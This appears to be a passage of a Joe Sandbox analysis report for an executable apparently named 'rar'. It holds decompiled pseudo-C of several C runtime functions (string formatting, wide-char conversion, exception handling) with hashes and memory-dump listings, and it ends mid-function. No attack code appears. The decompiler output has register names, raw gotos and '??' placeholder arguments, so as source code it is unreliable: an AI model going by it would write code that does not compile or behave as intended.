                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                            • Instruction ID: 373e145b665753d5ee278a526993e92a0d6daf3cb5168d9c12889efa7c0b024c
                                                                                                            • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                            • Instruction Fuzzy Hash: 27115126E18E0321F6B81528E4D637911616F9B3E0E0D4634ED7FE67D6CE2EE4404311
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B372D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 49%
                                                                                                            			E00007FF67FF650B372D0(signed int __ebx, signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int __ebp, long long __rbx, long long __rsi, long long __rbp, void* __r8, short* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v40;
				signed int _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed int _v72;
				signed int _v80;
				signed int _v88;
				signed int _v96;
				signed int _v104;
				signed int _t32;
				signed int _t79;
				signed int _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				void* _t106;
				void* _t114;
				void* _t136;
				short* _t137;

				_t134 = __r9;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t137 = __r9;
				_t136 = __r8;
				r15d = __ecx;
				_t106 = __edx;
				if (_t106 == 0) goto 0x50b3746a;
				_t92 = __edx - 1;
				if (_t106 == 0) goto 0x50b37322;
				if (_t92 != 1) goto 0x50b37510;
				E00007FF67FF650B5A390(__r8, "?", __r9);
				goto 0x50b37510;
				r10d = 0x2d;
				_t32 = r15d & 0x0000f000;
				if (_t32 == 0x4000) goto 0x50b3734b;
				if (_t32 == 0xa000) goto 0x50b37344;
				 *((intOrPtr*)(__r9)) = r10w;
				goto 0x50b37354;
				goto 0x50b37350;
				 *__r9 = 0x64;
				r14d = r10d;
				_t4 = _t137 - 1; // 0x1d
				r8d = r15d;
				r9d = r15d;
				r8d = r8d & 0x00000400;
				r9d = r9d & 0x00000800;
				asm("sbb ecx, ecx");
				_t84 = (__ecx & 0xfffffffc) + 0x78;
				r14d =  !=  ? _t84 : r14d;
				_v48 = r14d;
				asm("sbb ebp, ebp");
				_v56 = (__ebp & 0x0000004a) + r10d;
				asm("sbb esi, esi");
				_v64 = (__esi & 0x00000045) + r10d;
				asm("sbb ecx, ecx");
				_t86 = (_t84 & 0xfffffffb) + 0x78;
				r8d =  ~r8d;
				asm("sbb edi, edi");
				_t98 =  !=  ? _t86 : (__edi & 0x00000026) + r10d;
				_v72 =  !=  ? _t86 : (__edi & 0x00000026) + r10d;
				asm("sbb ebx, ebx");
				_t79 = (__ebx & 0x0000004a) + r10d;
				_v80 = _t79;
				asm("inc ebp");
				r11d = r11d & 0x00000045;
				r11d = r11d + r10d;
				_v88 = r11d;
				asm("sbb ecx, ecx");
				_t88 = (_t86 & 0xfffffffb) + 0x78;
				r9d =  ~r9d;
				asm("inc ebp");
				r10d = r10d & 0x00000026;
				r10d = r10d + 0x2d;
				r10d =  !=  ? _t88 : r10d;
				_v96 = r10d;
				_t18 = _t136 + 2; // -6422
				asm("inc ebp");
				r15d = r15d & 0x00000100;
				r8d = r8d & 0x0000004a;
				r8d = r8d + 0x2d;
				r15d =  ~r15d;
				_v104 = r8d;
				asm("inc ebp");
				r9d = r9d & 0x00000045;
				r9d = r9d + 0x2d;
				E00007FF67FF650B1657C(_t88, _t114, _t18, _t4, L"%c%c%c%c%c%c%c%c%c", __r9);
				goto 0x50b37510;
				asm("sbb ebx, ebx");
				_v64 = (_t79 & 0x00000024) + 0x2e;
				asm("inc ebp");
				r11d = r11d & 0x0000001a;
				r11d = r11d + 0x2e;
				_v72 = r11d;
				asm("inc ebp");
				r10d = r10d & 0x00000025;
				r10d = r10d + 0x2e;
				_v80 = r10d;
				asm("inc ebp");
				r8d = r8d & 0x00000016;
				r8d = r8d + 0x2e;
				_v88 = r8d;
				asm("sbb edx, edx");
				_v96 = (_t92 & 0x00000013) + 0x2e;
				asm("sbb ecx, ecx");
				r15d = r15d & 0x00002000;
				r15d =  ~r15d;
				_v104 = (_t88 & 0x00000015) + 0x2e;
				asm("inc ebp");
				r9d = r9d & 0x0000001b;
				r9d = r9d + 0x2e;
				return E00007FF67FF650B1657C((_t88 & 0x00000015) + 0x2e, _t114, _t136, _t137, L"%c%c%c%c%c%c%c", _t134);
			}






















                                                                                                            0x7ff650b372d0
                                                                                                            0x7ff650b372d0
                                                                                                            0x7ff650b372d5
                                                                                                            0x7ff650b372da
                                                                                                            0x7ff650b372ec
                                                                                                            0x7ff650b372ef
                                                                                                            0x7ff650b372f2
                                                                                                            0x7ff650b372f5
                                                                                                            0x7ff650b372f7
                                                                                                            0x7ff650b372fd
                                                                                                            0x7ff650b37300
                                                                                                            0x7ff650b37305
                                                                                                            0x7ff650b37318
                                                                                                            0x7ff650b3731d
                                                                                                            0x7ff650b37325
                                                                                                            0x7ff650b3732b
                                                                                                            0x7ff650b37335
                                                                                                            0x7ff650b3733c
                                                                                                            0x7ff650b3733e
                                                                                                            0x7ff650b37342
                                                                                                            0x7ff650b37349
                                                                                                            0x7ff650b37350
                                                                                                            0x7ff650b37354
                                                                                                            0x7ff650b37357
                                                                                                            0x7ff650b3735b
                                                                                                            0x7ff650b3735e
                                                                                                            0x7ff650b37361
                                                                                                            0x7ff650b37368
                                                                                                            0x7ff650b3737c
                                                                                                            0x7ff650b37381
                                                                                                            0x7ff650b37388
                                                                                                            0x7ff650b37390
                                                                                                            0x7ff650b37398
                                                                                                            0x7ff650b373a4
                                                                                                            0x7ff650b373ab
                                                                                                            0x7ff650b373b5
                                                                                                            0x7ff650b373bc
                                                                                                            0x7ff650b373c1
                                                                                                            0x7ff650b373c4
                                                                                                            0x7ff650b373c7
                                                                                                            0x7ff650b373d3
                                                                                                            0x7ff650b373da
                                                                                                            0x7ff650b373e1
                                                                                                            0x7ff650b373e8
                                                                                                            0x7ff650b373ed
                                                                                                            0x7ff650b373f4
                                                                                                            0x7ff650b373f7
                                                                                                            0x7ff650b373fb
                                                                                                            0x7ff650b37400
                                                                                                            0x7ff650b37408
                                                                                                            0x7ff650b3740d
                                                                                                            0x7ff650b37410
                                                                                                            0x7ff650b37413
                                                                                                            0x7ff650b37416
                                                                                                            0x7ff650b3741a
                                                                                                            0x7ff650b37422
                                                                                                            0x7ff650b3742a
                                                                                                            0x7ff650b3742f
                                                                                                            0x7ff650b37434
                                                                                                            0x7ff650b37437
                                                                                                            0x7ff650b3743e
                                                                                                            0x7ff650b37442
                                                                                                            0x7ff650b37446
                                                                                                            0x7ff650b37449
                                                                                                            0x7ff650b37455
                                                                                                            0x7ff650b37458
                                                                                                            0x7ff650b3745c
                                                                                                            0x7ff650b37460
                                                                                                            0x7ff650b37465
                                                                                                            0x7ff650b37479
                                                                                                            0x7ff650b37484
                                                                                                            0x7ff650b3748b
                                                                                                            0x7ff650b37490
                                                                                                            0x7ff650b37494
                                                                                                            0x7ff650b37499
                                                                                                            0x7ff650b374a1
                                                                                                            0x7ff650b374a6
                                                                                                            0x7ff650b374aa
                                                                                                            0x7ff650b374af
                                                                                                            0x7ff650b374b7
                                                                                                            0x7ff650b374bc
                                                                                                            0x7ff650b374c0
                                                                                                            0x7ff650b374c5
                                                                                                            0x7ff650b374d4
                                                                                                            0x7ff650b374e2
                                                                                                            0x7ff650b374e9
                                                                                                            0x7ff650b374eb
                                                                                                            0x7ff650b374f7
                                                                                                            0x7ff650b374fa
                                                                                                            0x7ff650b37501
                                                                                                            0x7ff650b37504
                                                                                                            0x7ff650b37508
                                                                                                            0x7ff650b3752d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                            • API String ID: 233258989-622958660
                                                                                                            • Opcode ID: a41a5cd61a27c8d44a0c9ba9122c3eaa767e889075c74868169ae598cca0f8a1
                                                                                                            • Instruction ID: f11bd8de2e4e91aa8def729e7f0ce8901ad665c85e2fb3b853e5e9a18edd8eaa
                                                                                                            • Opcode Fuzzy Hash: a41a5cd61a27c8d44a0c9ba9122c3eaa767e889075c74868169ae598cca0f8a1
                                                                                                            • Instruction Fuzzy Hash: 33514BF3F7C6455AE7698F1CE881BE92650F365B90F581A24F94BD3754CA3DDA408B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7A0AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 30%
                                                                                                            			E00007FF67FF650B7A0AC(void* __edx, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
				int _t35;
				void* _t37;
				int _t39;
				signed long long _t76;
				signed long long _t78;
				intOrPtr* _t86;
				signed long long _t93;
				signed long long _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t110 = _t109 - 0x60;
				_t108 = _t110 + 0x30;
				 *((long long*)(_t108 + 0x60)) = __rbx;
				 *((long long*)(_t108 + 0x68)) = __rsi;
				 *((long long*)(_t108 + 0x70)) = __rdi;
				_t76 =  *0x50b978f0; // 0x27db226282f1
				 *(_t108 + 0x20) = _t76 ^ _t108;
				r13d = __edx;
				r15d = r9d;
				_t100 = __rcx;
				E00007FF67FF650B6F614(_t76 ^ _t108, __rbx, _t108, __rcx);
				if ( *((intOrPtr*)(_t108 + 0x88)) != 0) goto 0x50b7a0ff;
				_t78 =  *((intOrPtr*)(_t108 + 8));
				 *(_t108 + 0x90) =  ~( *(_t108 + 0x90));
				r9d = r15d;
				asm("sbb edx, edx");
				 *(_t110 + 0x28) =  *(_t110 + 0x28) & 0x00000000;
				 *(_t110 + 0x20) =  *(_t110 + 0x20) & 0x00000000;
				_t35 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t35 != 0) goto 0x50b7a133;
				goto 0x50b7a224;
				_t104 = _t35 + _t35;
				_t15 = _t104 + 0x10; // 0x18
				asm("dec eax");
				if ((_t15 & _t78) == 0) goto 0x50b7a1bd;
				_t18 = _t104 + 0x10; // 0x18
				_t93 = _t18;
				asm("dec eax");
				_t19 = _t104 + 0x10; // 0x18
				if ((_t78 & _t93) - 0x400 > 0) goto 0x50b7a19b;
				asm("dec eax");
				_t20 = (_t93 & _t19) + 0xf; // 0x27
				if (_t20 - (_t93 & _t19) > 0) goto 0x50b7a17d;
				E00007FF67FF650B69CB0(_t35, 0xffffffffffffff0, __r10, __r11);
				_t111 = _t110 - 0xfffffff0;
				_t86 = _t111 + 0x30;
				if (_t86 == 0) goto 0x50b7a20c;
				 *_t86 = 0xcccc;
				goto 0x50b7a1b7;
				asm("dec eax");
				_t37 = E00007FF67FF650B7499C(0xffffffffffffff0, _t93 & _t19 & 0xfffffff0);
				if (0xfffffff0 == 0) goto 0x50b7a1bf;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x50b7a1bf;
				if (0xfffffff0 == 0) goto 0x50b7a20c;
				E00007FF67FF650B6C1A0(_t37, 0, 0xfffffff0, _t100, _t35 + _t35);
				r9d = r15d;
				 *((intOrPtr*)(_t111 + 0x28)) = r14d;
				 *((long long*)(_t111 + 0x20)) = 0xfffffff0;
				_t39 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t39 == 0) goto 0x50b7a20c;
				r8d = _t39;
				GetStringTypeW(??, ??, ??, ??);
				goto 0x50b7a20e;
				if (0xfffffff0 == 0) goto 0x50b7a224;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x50b7a224;
				E00007FF67FF650B7495C(0xffffffffffffff0, 0xffffffffffffff0);
				if ( *((char*)(_t108 + 0x18)) == 0) goto 0x50b7a235;
				 *( *_t108 + 0x3a8) =  *( *_t108 + 0x3a8) & 0xfffffffd;
				return E00007FF67FF650B69D10(0, r13d,  *(_t108 + 0x20) ^ _t108);
			}














                                                                                                            0x7ff650b7a0b6
                                                                                                            0x7ff650b7a0ba
                                                                                                            0x7ff650b7a0bf
                                                                                                            0x7ff650b7a0c3
                                                                                                            0x7ff650b7a0c7
                                                                                                            0x7ff650b7a0cb
                                                                                                            0x7ff650b7a0d5
                                                                                                            0x7ff650b7a0d9
                                                                                                            0x7ff650b7a0dc
                                                                                                            0x7ff650b7a0df
                                                                                                            0x7ff650b7a0e9
                                                                                                            0x7ff650b7a0f6
                                                                                                            0x7ff650b7a0f8
                                                                                                            0x7ff650b7a0ff
                                                                                                            0x7ff650b7a105
                                                                                                            0x7ff650b7a10d
                                                                                                            0x7ff650b7a10f
                                                                                                            0x7ff650b7a114
                                                                                                            0x7ff650b7a11f
                                                                                                            0x7ff650b7a12a
                                                                                                            0x7ff650b7a12e
                                                                                                            0x7ff650b7a136
                                                                                                            0x7ff650b7a139
                                                                                                            0x7ff650b7a140
                                                                                                            0x7ff650b7a146
                                                                                                            0x7ff650b7a148
                                                                                                            0x7ff650b7a148
                                                                                                            0x7ff650b7a14f
                                                                                                            0x7ff650b7a15b
                                                                                                            0x7ff650b7a15f
                                                                                                            0x7ff650b7a164
                                                                                                            0x7ff650b7a16a
                                                                                                            0x7ff650b7a171
                                                                                                            0x7ff650b7a181
                                                                                                            0x7ff650b7a186
                                                                                                            0x7ff650b7a189
                                                                                                            0x7ff650b7a191
                                                                                                            0x7ff650b7a193
                                                                                                            0x7ff650b7a199
                                                                                                            0x7ff650b7a19e
                                                                                                            0x7ff650b7a1a4
                                                                                                            0x7ff650b7a1af
                                                                                                            0x7ff650b7a1b1
                                                                                                            0x7ff650b7a1bb
                                                                                                            0x7ff650b7a1c2
                                                                                                            0x7ff650b7a1cc
                                                                                                            0x7ff650b7a1d1
                                                                                                            0x7ff650b7a1d4
                                                                                                            0x7ff650b7a1dc
                                                                                                            0x7ff650b7a1e8
                                                                                                            0x7ff650b7a1f0
                                                                                                            0x7ff650b7a1f9
                                                                                                            0x7ff650b7a202
                                                                                                            0x7ff650b7a20a
                                                                                                            0x7ff650b7a211
                                                                                                            0x7ff650b7a21d
                                                                                                            0x7ff650b7a21f
                                                                                                            0x7ff650b7a228
                                                                                                            0x7ff650b7a22e
                                                                                                            0x7ff650b7a25c

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$StringType
                                                                                                            • String ID: $%s
                                                                                                            • API String ID: 3586891840-3791308623
                                                                                                            • Opcode ID: 93ce5fd0cf653a1c9735b83be24bf4f10bbc89f69e30ff5db7250bd8cbf7eba8
                                                                                                            • Instruction ID: 17ba0be2e860207e0605ce6a5f6f4569f48a160e958ae351ae55ab4f324f93ca
                                                                                                            • Opcode Fuzzy Hash: 93ce5fd0cf653a1c9735b83be24bf4f10bbc89f69e30ff5db7250bd8cbf7eba8
                                                                                                            • Instruction Fuzzy Hash: B4419462B157876AEB608F65D8806A96391FF86BA8F4C0531DE1EA7BD5DF3DE4408300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6DD80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E00007FF67FF650B6DD80(void* __eflags, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
				char _v80;
				signed long long _v96;
				long long _v104;
				long long _v136;
				signed long long _v144;
				signed int _v152;
				long long _v160;
				long long _v168;
				signed long long _v176;
				signed int _v184;
				void* __rbx;
				void* _t105;
				void* _t124;
				long long _t125;
				signed long long _t129;
				signed int _t130;
				long long _t132;
				signed long long _t134;
				long long _t153;
				intOrPtr* _t154;
				void* _t155;
				void* _t158;
				signed long long _t161;

				_t124 = _t155;
				r12d = 0;
				_v184 = r12d;
				_a24 = _a24 & r12d;
				_v176 = _v176 & _t161;
				_v152 = _v152 & _t161;
				 *((intOrPtr*)(_t124 - 0x80)) = r12b;
				 *(_t124 - 0x7c) =  *(_t124 - 0x7c) & r12d;
				 *(_t124 - 0x78) =  *(_t124 - 0x78) & r12d;
				 *(_t124 - 0x74) =  *(_t124 - 0x74) & r12d;
				 *(_t124 - 0x70) =  *(_t124 - 0x70) & r12d;
				 *(_t124 - 0x6c) =  *(_t124 - 0x6c) & r12d;
				E00007FF67FF650B6C8F0(_t124);
				_t125 =  *((intOrPtr*)(_t124 + 0x28));
				_v160 = _t125;
				E00007FF67FF650B6C8F0(_t125);
				_v168 =  *((intOrPtr*)(_t125 + 0x20));
				_t153 =  *((intOrPtr*)(__rcx + 0x50));
				_a32 = _t153;
				_t132 =  *((intOrPtr*)(__rcx + 0x40));
				_v136 =  *((intOrPtr*)(__rcx + 0x30));
				_v104 =  *((intOrPtr*)(__rcx + 0x48));
				_t129 =  *((intOrPtr*)(__rcx + 0x68));
				_v96 = _t129;
				_a16 =  *((intOrPtr*)(__rcx + 0x78));
				_a8 =  *((intOrPtr*)(__rcx + 0x38));
				E00007FF67FF650B6E934( *((intOrPtr*)(__rcx + 0x38)), _t132);
				E00007FF67FF650B6C8F0(_t129);
				 *((long long*)(_t129 + 0x20)) = _t153;
				E00007FF67FF650B6C8F0(_t129);
				 *((long long*)(_t129 + 0x28)) = _t132;
				E00007FF67FF650B6C8F0(_t129);
				E00007FF67FF650B6B830(_t129,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0x20)) + 0x28)));
				_v144 = _t129;
				if ( *((intOrPtr*)(__rcx + 0x58)) == _t161) goto 0x50b6de82;
				_a24 = 1;
				E00007FF67FF650B6C8F0(_t129);
				_v152 =  *((intOrPtr*)(_t129 + 0x70));
				r8d = 0x100;
				E00007FF67FF650B6ED30(_v136,  *((intOrPtr*)(__rcx + 0x28)), _t158);
				_v176 = _t129;
				if (_t129 - 2 >= 0) goto 0x50b6deb6;
				_t134 =  *((intOrPtr*)(_t155 - 0xa8 + 0x70 + _t129 * 8));
				if (_t134 == 0) goto 0x50b6dfc9;
				_v176 = _t134;
				E00007FF67FF650B6ED60(_t134,  *((intOrPtr*)(__rcx + 0x28)));
				_v184 = 1;
				E00007FF67FF650B6C8F0(_t129);
				 *(_t129 + 0x40) =  *(_t129 + 0x40) & 0x00000000;
				E00007FF67FF650B6C8F0(_t129);
				 *((intOrPtr*)(_t129 + 0x78)) = _a16;
				_t154 = _a32;
				if (_a24 == 0) goto 0x50b6df1d;
				E00007FF67FF650B6AEA0(1, _t154);
				_t130 = _v152;
				r8d =  *((intOrPtr*)(_t130 + 0x18));
				goto 0x50b6df2a;
				r8d =  *((intOrPtr*)(_t154 + 0x18));
				RaiseException(??, ??, ??, ??);
				r12d = _v184;
				E00007FF67FF650B6B86C(_t130, _v176, _v144);
				if (r12d != 0) goto 0x50b6df88;
				if ( *_t154 != 0xe06d7363) goto 0x50b6df88;
				if ( *((intOrPtr*)(_t154 + 0x18)) != 4) goto 0x50b6df88;
				if ( *((intOrPtr*)(_t154 + 0x20)) - 0x19930520 - 2 > 0) goto 0x50b6df88;
				if (E00007FF67FF650B6AF14(_t130,  *((intOrPtr*)(_t154 + 0x28))) == 0) goto 0x50b6df88;
				E00007FF67FF650B6AEA0(1, _t154);
				E00007FF67FF650B6C8F0(_t130);
				 *((long long*)(_t130 + 0x20)) = _v168;
				E00007FF67FF650B6C8F0(_t130);
				 *((long long*)(_t130 + 0x28)) = _v160;
				E00007FF67FF650B6C8F0(_t130);
				 *((intOrPtr*)(_t130 + 0x78)) = _a8;
				_t105 = E00007FF67FF650B6C8F0(_t130);
				 *((intOrPtr*)(_t130 + 0x78)) = 0xfffffffe;
				return _t105;
			}


























                                                                                                            0x7ff650b6dd80
                                                                                                            0x7ff650b6dd96
                                                                                                            0x7ff650b6dd99
                                                                                                            0x7ff650b6dd9e
                                                                                                            0x7ff650b6dda6
                                                                                                            0x7ff650b6ddab
                                                                                                            0x7ff650b6ddb0
                                                                                                            0x7ff650b6ddb4
                                                                                                            0x7ff650b6ddb8
                                                                                                            0x7ff650b6ddbc
                                                                                                            0x7ff650b6ddc0
                                                                                                            0x7ff650b6ddc4
                                                                                                            0x7ff650b6ddc8
                                                                                                            0x7ff650b6ddcd
                                                                                                            0x7ff650b6ddd1
                                                                                                            0x7ff650b6ddd6
                                                                                                            0x7ff650b6dddf
                                                                                                            0x7ff650b6dde4
                                                                                                            0x7ff650b6dde8
                                                                                                            0x7ff650b6ddf0
                                                                                                            0x7ff650b6ddf8
                                                                                                            0x7ff650b6de05
                                                                                                            0x7ff650b6de0a
                                                                                                            0x7ff650b6de0e
                                                                                                            0x7ff650b6de16
                                                                                                            0x7ff650b6de20
                                                                                                            0x7ff650b6de2a
                                                                                                            0x7ff650b6de2f
                                                                                                            0x7ff650b6de34
                                                                                                            0x7ff650b6de38
                                                                                                            0x7ff650b6de3d
                                                                                                            0x7ff650b6de41
                                                                                                            0x7ff650b6de56
                                                                                                            0x7ff650b6de5e
                                                                                                            0x7ff650b6de67
                                                                                                            0x7ff650b6de69
                                                                                                            0x7ff650b6de74
                                                                                                            0x7ff650b6de7d
                                                                                                            0x7ff650b6de82
                                                                                                            0x7ff650b6de90
                                                                                                            0x7ff650b6de98
                                                                                                            0x7ff650b6dea1
                                                                                                            0x7ff650b6dea3
                                                                                                            0x7ff650b6deab
                                                                                                            0x7ff650b6deb1
                                                                                                            0x7ff650b6debc
                                                                                                            0x7ff650b6decd
                                                                                                            0x7ff650b6ded5
                                                                                                            0x7ff650b6deda
                                                                                                            0x7ff650b6dede
                                                                                                            0x7ff650b6deea
                                                                                                            0x7ff650b6deed
                                                                                                            0x7ff650b6defd
                                                                                                            0x7ff650b6df04
                                                                                                            0x7ff650b6df09
                                                                                                            0x7ff650b6df12
                                                                                                            0x7ff650b6df1b
                                                                                                            0x7ff650b6df21
                                                                                                            0x7ff650b6df2a
                                                                                                            0x7ff650b6df30
                                                                                                            0x7ff650b6df4c
                                                                                                            0x7ff650b6df54
                                                                                                            0x7ff650b6df5c
                                                                                                            0x7ff650b6df62
                                                                                                            0x7ff650b6df6f
                                                                                                            0x7ff650b6df7c
                                                                                                            0x7ff650b6df83
                                                                                                            0x7ff650b6df88
                                                                                                            0x7ff650b6df8d
                                                                                                            0x7ff650b6df91
                                                                                                            0x7ff650b6df96
                                                                                                            0x7ff650b6df9a
                                                                                                            0x7ff650b6dfa6
                                                                                                            0x7ff650b6dfa9
                                                                                                            0x7ff650b6dfae
                                                                                                            0x7ff650b6dfc8

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2466640111-1018135373
                                                                                                            • Opcode ID: afd5f2e1728d5b62e3526951348213c87a9633f0e25e224bcce05f43ee2be688
                                                                                                            • Instruction ID: 26478e7cc44192564633fa8dd0c833fe00cdd0fe37274ab0c2e64773ec002139
                                                                                                            • Opcode Fuzzy Hash: afd5f2e1728d5b62e3526951348213c87a9633f0e25e224bcce05f43ee2be688
                                                                                                            • Instruction Fuzzy Hash: 00515F72A18B8296D6309F15E48027E77B4FB8AB90F180134EF8E97B56CF39E451CB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B778FC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 16%
                                                                                                            			E00007FF67FF650B778FC(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, void* __r10, void* __r11, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				int _t33;
				signed int _t39;
				int _t48;
				signed long long _t60;
				short* _t65;
				signed int* _t66;
				void* _t88;
				void* _t100;
				void* _t101;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FF67FF650B69CB0(0x1470, __rax, __r10, __r11);
				_t60 =  *0x50b978f0; // 0x27db226282f1
				_a5176 = _t60 ^ _t88 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t101 = _t100 + __r8;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] =  *((intOrPtr*)(0x50bb3c40 + (__edx >> 6) * 8));
				if (__r8 - _t101 >= 0) goto 0x50b77a3f;
				_t65 =  &_a40;
				if (__r8 - _t101 >= 0) goto 0x50b779a7;
				_t39 =  *__r8 & 0x0000ffff;
				if (_t39 != 0xa) goto 0x50b77993;
				 *_t65 = 0xd;
				_t66 = _t65 + 2;
				 *_t66 = _t39;
